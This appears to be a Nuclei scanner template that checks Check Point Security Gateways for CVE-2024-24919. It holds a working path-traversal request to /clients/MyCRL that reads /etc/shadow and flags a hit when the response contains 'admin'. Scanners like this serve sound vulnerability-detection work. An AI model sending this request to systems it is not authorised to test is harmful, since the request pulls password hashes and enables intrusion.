id: CVE-2024-24919

info:
  name: Check Point Security Gateway Information Disclosure
  author: retnuhgubeht
  severity: info
  reference:
    - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
  tags: cve,cve2024,checkpoint

http:
  - method: POST
    path:
      - "{{BaseURL}}/clients/MyCRL"
      
    body: "aCSHELL/../../../../../../../etc/shadow"
    
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "admin"
        condition: and
      - type: status
        status:
          - 200
